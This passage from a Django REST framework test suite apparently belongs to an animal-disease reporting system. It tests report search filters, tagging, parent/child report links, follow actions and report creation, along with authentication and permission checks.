date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
report_2_days_ago = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last_2_day, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_2_days_ago.id)
def test_api_report_search_date_yesterday_timezone_with_authority(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
last_2_day = today - datetime.timedelta(days=2)
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
report_2_days_ago = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last_2_day, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_2_days_ago.id)
def test_api_report_search_date_this_week_timezone(self):
today = datetime.date.today()
week_start = today - datetime.timedelta(days=today.weekday())
before_week_start = week_start - datetime.timedelta(days=1)
report_before_week_start = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(before_week_start, datetime.time(22, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_before_week_start.id)
def test_api_report_search_date_this_week_timezone_with_authority(self):
today = datetime.date.today()
week_start = today - datetime.timedelta(days=today.weekday())
before_week_start = week_start - datetime.timedelta(days=1)
report_before_week_start = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(before_week_start, datetime.time(22, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_before_week_start.id)
def test_api_report_search_date_last_7_days_timezone(self):
today = datetime.date.today()
last8days = today - datetime.timedelta(days=8)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last8days, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_last_7_days_timezone_with_authority(self):
today = datetime.date.today()
last8days = today - datetime.timedelta(days=8)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last8days, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_date_range(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_timezone(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_timezone_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range_timezone(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
def test_api_report_search_date_datetime_range_timezone_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
def test_api_report_search_area_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=area: %s' % self.area1.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_area_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=area: %s' % self.area1.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_report_type_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=typeName: %s' % self.type2.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_report_type_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=typeName: %s' % self.type2.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_report_created_by_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.first_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.last_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.taeyeon.get_full_name())
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
def test_api_report_search_report_created_by_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.first_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.last_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.taeyeon.get_full_name())
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
def test_anonymous_cannot_access_api_list_search(self):
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 401)
class TestApiReportTags(APITestCase):
def setUp(self):
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.type = factory.create_report_type(authority=self.authority)
self.area = factory.create_administration_area(authority=self.authority)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=self.area, date=datetime.datetime(2014, 11, 11, 12, 30, 45))
def test_anonymous_cannot_access_api_post_report_tags(self):
params = {}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 401)
def test_cannot_post_report_tags_without_data(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 400)
def test_cannot_post_report_tags_without_report_ids(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {
'tags': [
{'text': 'test'},
],
}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 400)
def test_cannot_post_report_tags_without_tags(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {
'reportIds': [self.report1.id, self.report2.id]
}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 400)
def test_cannot_post_report_tags(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {
'reportIds': [self.report1.id, self.report2.id],
'tags': [
{'text': 'test'},
],
}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 200)
report1 = Report.objects.get(id=self.report1.id)
self.assertTrue("test" in report1.tags.values_list('name', flat=True))
report2 = Report.objects.get(id=self.report2.id)
self.assertTrue("test" in report2.tags.values_list('name', flat=True))
def test_cannot_post_report_multiple_tags(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {
'reportIds': [self.report1.id, self.report2.id],
'tags': [
{'text': 'test1'},
{'text': 'test2'},
{'text': 'test3'},
],
}
response = self.client.post(reverse('add_reports_tags'), params)
self.assertEqual(response.status_code, 200)
report1 = Report.objects.get(id=self.report1.id)
self.assertTrue("test1" in report1.tags.values_list('name', flat=True))
self.assertTrue("test2" in report1.tags.values_list('name', flat=True))
self.assertTrue("test3" in report1.tags.values_list('name', flat=True))
report2 = Report.objects.get(id=self.report2.id)
self.assertTrue("test1" in report2.tags.values_list('name', flat=True))
self.assertTrue("test2" in report2.tags.values_list('name', flat=True))
self.assertTrue("test3" in report2.tags.values_list('name', flat=True))
class TestApiReportInvolved(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.yoona)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.type3 = factory.create_report_type()
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
self.area3 = factory.create_administration_area()
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area1, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, parent=self.report1,
date=datetime.datetime(2014, 11, 9, 12, 30, 45))
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area1, parent=self.report1,
date=datetime.datetime(2014, 11, 11, 13, 30, 45))
self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
def test_api_report_involved_that_report_is_parent(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
report1 = response_json[0]
self.assertEqual(report1['id'], self.report3.id)
self.assertEqual(report1['reportId'], self.report3.report_id)
self.assertEqual(report1['guid'], self.report3.guid)
self.assertEqual(report1['reportTypeId'], self.report3.type.id)
self.assertEqual(report1['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report1['negative'], self.report3.negative)
self.assertEqual(report1['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report1['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report2 = response_json[1]
self.assertEqual(report2['id'], self.report2.id)
self.assertEqual(report2['reportId'], self.report2.report_id)
self.assertEqual(report2['guid'], self.report2.guid)
self.assertEqual(report2['reportTypeId'], self.report2.type.id)
self.assertEqual(report2['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report2['negative'], self.report2.negative)
self.assertEqual(report2['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report2['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
def test_api_report_involved_that_report_is_parent_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
report1 = response_json[0]
self.assertEqual(report1['id'], self.report3.id)
self.assertEqual(report1['reportId'], self.report3.report_id)
self.assertEqual(report1['guid'], self.report3.guid)
self.assertEqual(report1['reportTypeId'], self.report3.type.id)
self.assertEqual(report1['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report1['negative'], self.report3.negative)
self.assertEqual(report1['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report1['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report2 = response_json[1]
self.assertEqual(report2['id'], self.report2.id)
self.assertEqual(report2['reportId'], self.report2.report_id)
self.assertEqual(report2['guid'], self.report2.guid)
self.assertEqual(report2['reportTypeId'], self.report2.type.id)
self.assertEqual(report2['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report2['negative'], self.report2.negative)
self.assertEqual(report2['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report2['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
def test_api_report_involved_that_report_is_child(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report2.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
report1 = response_json[0]
self.assertEqual(report1['id'], self.report3.id)
self.assertEqual(report1['reportId'], self.report3.report_id)
self.assertEqual(report1['guid'], self.report3.guid)
self.assertEqual(report1['reportTypeId'], self.report3.type.id)
self.assertEqual(report1['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report1['negative'], self.report3.negative)
self.assertEqual(report1['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report1['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report2 = response_json[1]
self.assertEqual(report2['id'], self.report1.id)
self.assertEqual(report2['reportId'], self.report1.report_id)
self.assertEqual(report2['guid'], self.report1.guid)
self.assertEqual(report2['reportTypeId'], self.report1.type.id)
self.assertEqual(report2['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report2['negative'], self.report1.negative)
self.assertEqual(report2['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report2['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_involved_that_report_is_child_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report2.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
report1 = response_json[0]
self.assertEqual(report1['id'], self.report3.id)
self.assertEqual(report1['reportId'], self.report3.report_id)
self.assertEqual(report1['guid'], self.report3.guid)
self.assertEqual(report1['reportTypeId'], self.report3.type.id)
self.assertEqual(report1['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report1['negative'], self.report3.negative)
self.assertEqual(report1['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report1['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report2 = response_json[1]
self.assertEqual(report2['id'], self.report1.id)
self.assertEqual(report2['reportId'], self.report1.report_id)
self.assertEqual(report2['guid'], self.report1.guid)
self.assertEqual(report2['reportTypeId'], self.report1.type.id)
self.assertEqual(report2['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report2['negative'], self.report1.negative)
self.assertEqual(report2['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report2['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_involved_results_only_have_permission_on_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report4.id]))
self.assertEqual(response.status_code, 403)
def test_api_report_involved_results_only_have_permission_on_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-involved', args=[self.report5.id]))
self.assertEqual(response.status_code, 403)
def test_anonymous_cannot_access_api_list_reports(self):
response = self.client.get(reverse('report-involved', args=[self.report1.id]))
self.assertEqual(response.status_code, 401)
class TestApiReportFollow(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.yoona)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.type3 = factory.create_report_type()
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
self.area3 = factory.create_administration_area()
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area1, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, date=datetime.datetime(2014, 11, 9, 12, 30, 45))
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area1, date=datetime.datetime(2014, 11, 11, 13, 30, 45))
self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
def test_api_post_report_follow(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'parent': self.report2.id
}
response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 200)
report1 = Report.objects.get(id=self.report1.id)
self.assertEqual(report1.parent, self.report2)
# CHECK CREATE REPORT COMMENT FLAG
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, report1)
self.assertEqual(comment.created_by, self.taeyeon)
flag = Flag.objects.latest('id')
self.assertEqual(flag.comment, comment)
self.assertEqual(flag.priority, PRIORITY_FOLLOW)
self.assertEqual(flag.flag_owner, self.taeyeon)
def test_api_post_report_follow_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'parent': self.report2.id
}
response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 200)
report1 = Report.objects.get(id=self.report1.id)
self.assertEqual(report1.parent, self.report2)
# CHECK CREATE REPORT COMMENT FLAG
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, report1)
self.assertEqual(comment.created_by, self.yoona)
flag = Flag.objects.latest('id')
self.assertEqual(flag.comment, comment)
self.assertEqual(flag.priority, PRIORITY_FOLLOW)
self.assertEqual(flag.flag_owner, self.yoona)
def test_api_post_report_follow_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.post(reverse('report-follow', args=[self.report1.id]))
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['parent'], 'This field is required.')
params = {
'parent': 12345,
}
response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['parent'], 'Report not found.')
'''
def test_api_post_report_follow_only_have_permission_on_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.post(reverse('report-follow', args=[self.report4.id]))
self.assertEqual(response.status_code, 403)
'''
def test_api_post_report_follow_only_have_permission_on_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.post(reverse('report-follow', args=[self.report5.id]))
self.assertEqual(response.status_code, 403)
def test_anonymous_cannot_access_api_post_report_follow(self):
response = self.client.post(reverse('report-follow', args=[self.report1.id]))
self.assertEqual(response.status_code, 401)
def test_cannot_get_api_post_report_follow(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-follow', args=[self.report1.id]))
self.assertEqual(response.status_code, 405)
class TestApiReportCreate(APITestCase):
def setUp(self):
try:
self.default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
self.default_positive_type = ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('log_action_create', interactive=False, verbosity=0)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user(administration_area=factory.create_administration_area())
self.jessica = factory.create_user()
self.yoona = factory.create_user(is_superuser=True, is_staff=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.type = factory.create_report_type(authority=self.authority)
self.area = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.krystal, type=self.type,
administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
def test_post_api_report_create(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.report_id, 123)
self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
self.assertEqual(report.type, self.type)
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
self.assertEqual(report.administration_area, self.area)
self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
self.assertEqual(report.negative, True)
self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
self.assertEqual(json.loads(report.form_data), {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
})
self.assertEqual(report.created_by, self.taeyeon)
def test_post_api_report_create_with_report_type_code(self):
"""Use report type code instead of report type id"""
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": 10001,
"guid": "guid-1001",
"reportTypeCode": self.type.code,
"date": timezone.now(),
"incidentDate": timezone.now().strftime('%Y-%m-%d'),
"administrationAreaId": self.area.id,
"formData": {},
"negative": True
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
created_report = Report.objects.latest('id')
self.assertEqual(created_report.type.id, self.type.id)
def test_post_api_report_create_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": 123,
"guid": "09d09djjjkdf09df0dfdfdfdf",
"reportTypeId": self.type.id,
"date": "2014-09-01T04:11:15+07:00",
"incidentDate": "2014-09-01",
"administrationAreaId": self.area.id,
"remark": "xxxxxxxxxxxxxx",
"formData": {
"animalType": "dog",
"symptom": "cough,fever,pain",
"sickCount": 4,
"deathCount": 3,
"totalCount": 12,
"nearByCount": 3
},
"negative": True,
"reportLocation": {
"latitude": 13.8082770000000004,
"longitude": 100.7522060000000010
}
}
response = self.client.post(reverse('report-list'), params)
self.assertEqual(response.status_code, 201)
class TZ(datetime.tzinfo):
def utcoffset(self, dt):
return datetime.timedelta(minutes=420)
report = Report.objects.latest('id')
self.assertEqual(report.report_id, 123)
self.assertEqual(report.guid, '09d09djjjkdf09df0dfdfdfdf')
self.assertEqual(report.type, self.type)
self.assertEqual(report.date, datetime.datetime(2014, 9, 1, 4, 11, 15, tzinfo=TZ()))
self.assertEqual(report.incident_date, datetime.date(2014, 9, 1))
self.assertEqual(report.administration_area, self.area)
self.assertEqual(report.administration_location.wkt, self.area.location.wkt)
self.assertEqual(report.remark, 'xxxxxxxxxxxxxx')
self.assertEqual(report.negative, True)
self.assertEqual(report.report_location.wkt, 'POINT (100.7522060000000010 13.8082770000000004)')
self.assertEqual(json.loads(report.form_data), {
"animalType": "dog",
